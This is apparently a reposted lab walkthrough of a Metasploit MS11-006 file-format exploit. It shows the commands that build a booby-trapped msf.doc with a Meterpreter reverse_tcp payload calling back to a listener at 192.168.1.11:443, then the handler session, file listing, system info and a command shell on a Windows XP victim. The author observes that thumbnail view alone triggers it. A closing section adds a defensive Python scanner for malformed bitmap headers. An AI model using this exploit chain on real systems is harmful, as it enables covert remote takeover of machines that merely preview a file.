Metasploit file-format vulnerability exploitation (shell obtained successfully)

Source: the Internet
Uploaded by: User

Environment: BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf  exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf  exploit(handler) >

I copied msf.doc onto the XP machine. At first I double-clicked it, and BT5 showed no reaction.

Later I switched the folder to thumbnail view; without double-clicking msf.doc at all, BT5 got a response (the book says the document has to be opened, which I suspect is a mistake).

msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

If I switch to a Simplified Chinese edition of XP and use thumbnail view, it fails and no shell is obtained.
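An added defender-side example, not part of the original post: the thumbnail-view behaviour observed above matches how MS11-006 is triggered, since the flaw lies in the Windows shell's thumbnail bitmap parser, and Microsoft's advisory describes the malformed input as a BITMAPINFOHEADER whose biClrUsed field is negative when read as a signed 32-bit integer (a fact stated here from the public advisory, not from this page). The scanner below walks an arbitrary byte blob (a file carved out of a document, for instance) for BITMAPINFOHEADER structures and flags that condition plus palette counts the bit depth cannot support; the sample container bytes are constructed inline.

```python
import struct

INFO_HDR_LEN = 40                      # sizeof(BITMAPINFOHEADER)
INFO_HDR_FMT = "<IiiHHIIiiII"          # little-endian field layout of BITMAPINFOHEADER
INFO_HDR_NAMES = ("biSize", "biWidth", "biHeight", "biPlanes", "biBitCount",
                  "biCompression", "biSizeImage", "biXPelsPerMeter",
                  "biYPelsPerMeter", "biClrUsed", "biClrImportant")
VALID_BPP = {1, 4, 8, 16, 24, 32}

def parse_info_header(blob, off):
    """Decode one BITMAPINFOHEADER starting at byte offset `off`."""
    return dict(zip(INFO_HDR_NAMES, struct.unpack_from(INFO_HDR_FMT, blob, off)))

def check_dib_header(hdr):
    """Return the reasons this header is malformed (empty list = looks sane)."""
    findings = []
    clr_used, bpp = hdr["biClrUsed"], hdr["biBitCount"]
    if clr_used & 0x80000000:
        # Negative once a parser reads it as a signed int32: the MS11-006 trigger condition
        findings.append("biClrUsed 0x%08x is negative as int32" % clr_used)
    elif bpp <= 8 and clr_used > (1 << bpp):
        # An indexed image cannot have more palette entries than 2**bpp
        findings.append("biClrUsed %d exceeds the %d-entry palette for %d bpp"
                        % (clr_used, 1 << bpp, bpp))
    return findings

def scan_for_dibs(blob):
    """Locate every plausible BITMAPINFOHEADER in `blob`; return [(offset, findings)]."""
    results, off = [], 0
    marker = struct.pack("<I", INFO_HDR_LEN)   # biSize == 40 acts as the header's signature
    while True:
        off = blob.find(marker, off)
        if off < 0 or off + INFO_HDR_LEN > len(blob):
            break
        hdr = parse_info_header(blob, off)
        if hdr["biPlanes"] == 1 and hdr["biBitCount"] in VALID_BPP:  # cut false positives
            results.append((off, check_dib_header(hdr)))
        off += 1
    return results

def make_info_header(width, height, bpp, clr_used):
    """Constructed test data: a 40-byte BITMAPINFOHEADER (BI_RGB, no pixel data follows)."""
    return struct.pack(INFO_HDR_FMT, INFO_HDR_LEN, width, height, 1, bpp, 0, 0,
                       2835, 2835, clr_used, 0)

# Constructed sample container: filler, a sane 8-bpp thumbnail header, then a malformed one
SAMPLE = (b"\x00" * 16 + b"BM" + b"\x00" * 12 + make_info_header(96, 96, 8, 256)
          + b"\xAA" * 32 + make_info_header(96, 96, 8, 0xFFFFFFF0))

if __name__ == "__main__":
    for offset, findings in scan_for_dibs(SAMPLE):
        print(offset, "OK" if not findings else "; ".join(findings))
```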
